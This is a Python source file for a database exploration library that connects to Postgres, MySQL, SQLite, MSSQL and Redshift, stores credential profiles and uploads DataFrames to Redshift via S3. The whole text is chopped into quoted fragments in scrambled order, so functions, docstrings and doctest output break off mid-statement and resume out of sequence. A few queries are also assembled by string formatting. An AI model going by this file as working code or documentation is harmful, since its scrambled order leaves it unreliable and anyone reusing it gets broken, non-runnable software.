{{#if @last}} ...", "port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\'", "4 5 Big Ones 3 \"\"\" if data: q = self._apply_handlebars(q, data, union)", "= profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all credentials", "Python 2.7 except: from io import StringIO # Python 3.3+ import uuid import", "| INTEGER | | Invoice | CustomerId | INTEGER | | InvoiceLine |", "query for getting all key relationships # 3. use the naive approach if", "= False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for", "you probably don't need this, but if you're a db admin you might", "| | Genre | GenreId | INTEGER | | Invoice | InvoiceId |", "values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls", "except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db =", "u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype':", "lazily importing boto only if necessary here. if bucket_location is None: bucket_location =", "| | MediaType | Name | NVARCHAR(120) | | Playlist | Name |", "query = [template(item) for item in data] query = [str(item) for item in", "queries as a single data frame. limit: int Number of records to return", "method, or by passing an argument to `DB()`. None indicates that there will", "Server\", server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str = ((self.username and self.password)", "given profile. 
Profiles are stored in ~/.db.py_{profile_name} and are a base64 encoded JSON", "s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is", ">>> from db import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f", "on specific buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket", "None Default number of records to return in a query. This is used", "sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if", "self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row in rows_to_insert:", "and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar,", "Snowballed 0.99 9 Evil Walks 0.99 >>> template = ''' ... SELECT ...", "dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import DemoDB >>> db =", "raise Exception(\"Must specify AWS_SECRET_KEY as either function argument or as an environment variable", "the database needs in order to operate). This includes things like schema definitions.", "self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column", "Query string to execute data: list, dict Optional argument for handlebars-queries. 
Data will", "data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some way", "sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql +", "tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists", "dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is None:", "password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\")", "int, None Default number of records to return in a query. This is", "= DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def", "data_type: str, list (optional) specify which data type(s) you want to return Examples", "limit: q = \"select top {limit} * from ({q}) q\".format(limit=limit, q=q) return q", "self.keys_per_column = keys_per_column self.driver = driver if self.dbtype is None: raise Exception(\"Database type", ">>> db.query(q, data=data) table_name cnt 0 Album 347 1 Artist 275 2 Track", "varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master", "Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99 2 3990994 0.99 3 4331779", "can use an S3 object print_sql: bool (False) option for printing sql statement", "... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM ... 
Album a", "For Those About To Rock We Salute You 1 1 2 Balls to", "from io import StringIO # Python 3.3+ import uuid import re import os", "self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in self._metadata_cache: # table metadata", "col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is not", "will try and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your aws", "/ profile for how you like your queries exclude_system_tables: bool Whether or not", "creds = load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port", "True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class", "installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\",", "self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port,", "to drop the table if it already exists chunk_size: int (10000) Number of", "redshift sql = pd.io.sql.get_schema(df, name) # defaults to using SQLite format. 
need to", "| | PlaylistTrack | TrackId | INTEGER | | PlaylistTrack | PlaylistId |", "item in query] if union==True: query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query)", "\"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\"", "= sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table ONLY if it doens't", "list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port':", "INTEGER | | InvoiceLine | InvoiceId | INTEGER | | MediaType | MediaTypeId", "1 1 1 2 Balls to the Wall 2 2 <BLANKLINE> GenreId Composer", "find for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name", "'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql", "| Column Name | Type | +---------------+---------------+---------+ | Album | AlbumId | INTEGER", "postgres, mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit:", "Python 3.3+ import uuid import re import os import sys from collections import", "tmp >>> results = db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_ >>>", "2 3 4 Let There Be Rock 1 4 5 Big Ones 3", "the s3 argument is a prefix, so it'll pick up # all of", "t.Name, ... t.UnitPrice ... FROM ... Album a ... INNER JOIN ... Track", "8 For Those About To Rock We Salute You 9 For Those About", "for all those doctests to be viable... 
-= if not, there's always a", "self.dbname = dbname self.dbtype = dbtype self.schemas = schemas self.limit = limit self.keys_per_column", "self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql", "elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg", "Query your database with a raw string. Parameters ---------- q: str Query string", "for t in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t,", "\"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name,", "unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for item in", "print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self,", "cols = [] for table in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col,", "[str(item) for item in query] if union==True: query = \"\\nUNION ALL\".join(query) else: query", "as pyo HAS_ODBC = True except ImportError: try: import pypyodbc as pyo HAS_ODBC", "table. Parameters ----------- search: str glob pattern for what you're looking for Examples", "on a.AlbumId = t.AlbumId; ... 
''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\", "Salute You 1 1 2 Balls to the Wall 2 2 3 Restless", "pattern for what you're looking for Examples ---------- >>> from db import DemoDB", "TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self,", "# col metadata: format as list of tuples, to match how normal loading", "{ \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname,", "creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\"", "<NAME>, <NAME>, <NAME> 343719 11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0", "chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift", "None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select * from Track\",", "table df: DataFrame data frame you want to save to the db drop_if_exists:", "\"10.20.1.248\") port: int Port the database is running on. defaults to default port", "col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is not None and", "and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column Name | Type", "BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine", "not remove profile {0}! 
Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an", "sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\")", "\"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for", "ONLY if it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT", "limit: int, None Default number of records to return in a query. This", "ReportsTo | INTEGER | | Employee | EmployeeId | INTEGER | | Employee", "not \"UNION ALL\" handlebars templates. This will return any handlebars queries as a", "W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1", "Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql, &", "try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError: try: import", "col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column) and", "if not, there's always a random issue where rows are not in the", "TrackId Name AlbumId MediaTypeId \\ 0 1 For Those About To Rock (We", "Your password for the database hostname: str Hostname your database is running on", "# returns all tables containing trans >>> results = db.find_table(\"*\") # returns everything", "query_templates # attempt to import the relevant database libraries # TODO: maybe add", "need this, but if you're a db admin you might actually want to", "representation of all credentials for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename)", "CustomerId | INTEGER | | Employee | ReportsTo | INTEGER | | Employee", "3 Restless and Wild 2 3 4 Let There Be Rock 1 4", "# returns all columns ending w/ Id +---------------+---------------+---------+ | Table | Column Name", "way users with permission on specific 
buckets can use this feature bucket_name =", "See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data',", "str your aws access key. if this is None, the function will try", "self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables", "union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1 For Those About", "data] query = [str(item) for item in query] if union==True: query = \"\\nUNION", "= sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\")", "doctest, covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname':", "HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname =", "join all threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql =", "TrackId | INTEGER | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine", "Parameters ---------- name: str name for your shiny new table df: DataFrame data", "<NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0", "= True except ImportError: HAS_MYSQL = False try: import sqlite3 as sqlite HAS_SQLITE", "db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432,", "Salute You) 1 1 1 2 Balls to the Wall 2 2 2", "def tables(self): \"\"\"A lazy loaded reference to the table metadata for the DB.\"\"\"", "open(\"db/tests/myscript.sql\", \"w\") as f: ... 
f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10)", "2 3 4 Restless and Wild 3 2 4 5 Princess of the", "if drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql +", "INTEGER | | Artist | ArtistId | INTEGER | | Customer | SupportRepId", "as e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback()", "glob pattern for what you're looking for Examples ---------- >>> from db import", "Up 0.99 7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks", "schema # 1. load directly from cache # 2. use a single query", "metadata. Please wait...\") for table in self._metadata_cache: # table metadata table_meta[table['name']] = {k:", "if it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\")", "AWS_SECRET_KEY: str your aws secrety key. if this is None, the function will", "len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format(", "# much faster when it comes time to run the \\COPY statment. #", "if use_cache: # generate our Tables, and load them into a TableSet self._tables", "chunk the file into pieces. according to amazon, this is # much faster", "system tables. limit: int, None Default number of records to return in a", ") ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except:", "except ImportError: HAS_PG = False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL =", "self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column,", "secrety key. 
if this is None, the function will try and grab AWS_SECRET_KEY", "n/a mssql: 1433 filename: str path to sqlite database dbname: str Name of", "w/ tmp >>> results = db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_", "foreign/ref key query by doing it one time, database-wide, if query is available", "tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table", "Type | +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) | | Genre |", "5 Princess of the Dawn 3 2 5 6 Put The Finger On", "relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load", "= self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def", "2 Track 3503 >>> q = ''' ... SELECT ... {{#cols}} ... {{#if", "sister from stealing your passwords. Parameters ---------- profile: str (optional) identifier/name for your", "0 0.99 1 0.99 db.query(\"select * from Track\", limit=10) TrackId Name AlbumId MediaTypeId", "dbname self.dbtype = dbtype self.schemas = schemas self.limit = limit self.keys_per_column = keys_per_column", "INTEGER | | Album | ArtistId | INTEGER | | Artist | ArtistId", "redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key import Key from boto.s3.connection import", "db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address that are varchars +----------+----------------+--------------+ |", "# all of the data*.gz files we've created sys.stderr.write(\"Copying data from s3 to", "cmd): try: self.cur.execute(cmd) except Exception as e: print (\"Error executing command:\") print (\"\\t", "are stored in ~/.db.py_{profile_name} and are a base64 encoded JSON file. This is", "\"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... 
] >>> db.query(q, data=data) table_name", "def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables (at least ones that", "<PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\") for", "results = db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_ >>> results =", "the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None return", "\"\"\" Utility for exploring and querying a database. Parameters ---------- username: str Your", "= self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for item in data] query", "and username is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and", "db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql')", "(False) option for printing sql statement that will be executed bucket_location: boto.s3.connection.Location a", "in script. Parameters ---------- profile: str (optional) identifier/name for your database (i.e. \"dw\",", "# if boto is present, set the bucket_location to default. # we can't", "| | Artist | ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") #", "2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME>", "list of tuples if told to use cached metadata if use_cache and self._metadata_cache:", "a secure way to store sensitive data, but it will probably stop your", "a Shark 0.99 3 Restless and Wild 0.99 4 Princess of the Dawn", "db.py profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property", "default. 
# we can't do this in the function definition because we're #", "About To Rock (We Salute You) 1 1 1 2 Balls to the", "For Those About To Rock We Salute You 9 For Those About To", "return self.__str__() def __delete__(self): del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads", "| AlbumId | INTEGER | | Album | ArtistId | INTEGER | |", "and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three", "Type | +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Customer |", "Column, ColumnSet from .table import Table, TableSet from .s3 import S3 from .utils", "self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2 library. Please ensure", "| Name | NVARCHAR(120) | | MediaType | Name | NVARCHAR(120) | |", "| TrackId | INTEGER | | Track | AlbumId | INTEGER | |", "1 Balls to the Wall 2 Restless and Wild 3 Restless and Wild", "all tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\") # returns all tables", "Rock We Salute You 7 For Those About To Rock We Salute You", "= os.path.join(os.getcwd(), self.filename) else: db_filename = None return { \"username\": self.username, \"password\": self.password,", "from StringIO import StringIO # Python 2.7 except: from io import StringIO #", "an argument to `DB()`. None indicates that there will be no limit (That's", "for a given profile. Profiles are stored in ~/.db.py_{profile_name} and are a base64", "col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing", "data: list, dict Optional argument for handlebars-queries. 
Data will be passed to the", "value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC", "Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t,", "redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as", "framework), so we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema. This will take", "pd import pybars from .column import Column, ColumnSet from .table import Table, TableSet", "(3, 0)): q = unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query =", "\"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True)", "None) if tables: profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]] = profile", "return Examples ---------- >>> from db import DemoDB >>> db = DemoDB() >>>", "1 9 10 Evil Walks 1 1 GenreId Composer Milliseconds \\ 0 1", "Title, ArtistId | | Artist | ArtistId, Name | +--------+--------------------------+ >>> results =", "user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del self.cur del self.con def", "+----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address that are varchars +----------+----------------+--------------+", "10 Evil Walks 1 1 GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>,", "a base64 encoded JSON file. This is not to say this a secure", "str (optional) identifier/name for your database (i.e. 
\"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID,", "table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT", "Restless and Wild 3 2 4 5 Princess of the Dawn 3 2", "= \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif", "1 2 Balls to the Wall 2 2 2 3 Fast As a", "you're looking for Examples ---------- >>> from db import DemoDB >>> db =", "for Examples ---------- >>> from db import DemoDB >>> db = DemoDB() >>>", "create them. \"\"\" sys.stderr.write(\"Indexing schema. This will take a second...\") rows_to_insert = []", "<NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>,", "= pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference to the table metadata", "The Finger On You 1 1 6 7 Let's Get It Up 1", "profile=\"default\"): \"\"\" Save your database credentials so you don't have to save them", "passing an argument to `DB()`. None indicates that there will be no limit", "for table in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) #", "data*.gz files we've created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql = \"\"\"", "# mssql else: if limit: q = \"select top {limit} * from ({q})", "use a single query for getting all key relationships # 3. use the", "\"\"\" user = os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID + name) else:", "optimize the foreign/ref key query by doing it one time, database-wide, if query", "as cnt ... FROM ... {{ name }} ... GROUP BY ... 
table_name", "8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with open(filename) as fp: q", "| | Playlist | Name | NVARCHAR(120) | | Track | Name |", "self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search through your database's", "the data*.gz files we've created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql =", "233926 7 1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102", "'name', 'foreign_keys', 'ref_keys')} # col metadata: format as list of tuples, to match", "re import os import sys from collections import defaultdict import pandas as pd", "mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL:", "host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not", "df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe", "isinstance(data, dict): query = template(data) query = str(query) else: return q return query", "sqlite library. Please ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor()", "<filename>IronManFly/storage/db/db.py import threading import glob import gzip try: from StringIO import StringIO #", "sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df = len(df) chunks = range(0, len_df,", "Address | NVARCHAR(70) | | Customer | SupportRepId | INTEGER | | Customer", "for your database (i.e. 
\"dw\", \"prod\") from db import DB import pymysql db", "col).type not in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols)", "def _assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite if self.dbtype in [\"postgres\",", "try: import pyodbc as pyo HAS_ODBC = True except ImportError: try: import pypyodbc", "| Employee | Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70)", "data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}',", "for any new tables and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables", "as a single data frame. limit: int Number of records to return Examples", "query def query(self, q, data=None, union=True, limit=None): \"\"\" Query your database with a", "... {{#if @last}} ... {{ . }} ... {{else}} ... {{ . }}", "except ImportError: try: import pypyodbc as pyo HAS_ODBC = True except ImportError: HAS_ODBC", "1433 elif profile is not None: pass else: raise Exception(\"Database type not specified!", "dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del self.cur del self.con def load_credentials(self,", "in self.cur: # second value in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel)", "Put The Finger On You 0.99 6 Let's Get It Up 0.99 7", "... t.Name, ... t.UnitPrice ... FROM ... Album a ... INNER JOIN ...", "str Your password for the database hostname: str Hostname your database is running", "an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column Name", "You 1 1 6 7 Let's Get It Up 1 1 7 8", "specify AWS_SECRET_KEY as either function argument or as an environment variable `AWS_SECRET_KEY`\") conn", "up # all of the data*.gz files we've created sys.stderr.write(\"Copying data from s3", "db. 
portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433 filename: str", "if tables: profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]] = profile return", "f = os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID + name)", "| CustomerId | INTEGER | | Invoice | BillingAddress | NVARCHAR(70) | |", "save to the db drop_if_exists: bool (False) whether you'd like to drop the", "= False try: import sqlite3 as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE", "str your aws secrety key. if this is None, the function will try", "boto.s3.key import Key from boto.s3.connection import Location # if boto is present, set", "library. Please ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable()", "here. if bucket_location is None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find", "\"\"\" with open(filename) as fp: q = fp.read() return self.query(q, data=data, union=union, limit=limit)", "except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object):", "looks for any new tables and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache)", "Location # if boto is present, set the bucket_location to default. # we", "it will probably stop your little sister from stealing your passwords. 
Parameters ----------", "You can override it by adding limit={X} to the `query` method, or by", "amazon, this is # much faster when it comes time to run the", "'{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';\") # find", "an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as", "http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df = len(df) chunks = range(0,", "= S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' %", "if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket", "database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in", "3 4331779 0.99 4 6290521 0.99 5 6713451 0.99 6 7636561 0.99 7", "not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in", "+-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/ Id +---------------+---------------+---------+ | Table |", "in ~/.db.py_{profile_name} and are a base64 encoded JSON file. This is not to", "if f: prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the", "if chunks = multiple-of-slices. Ex: 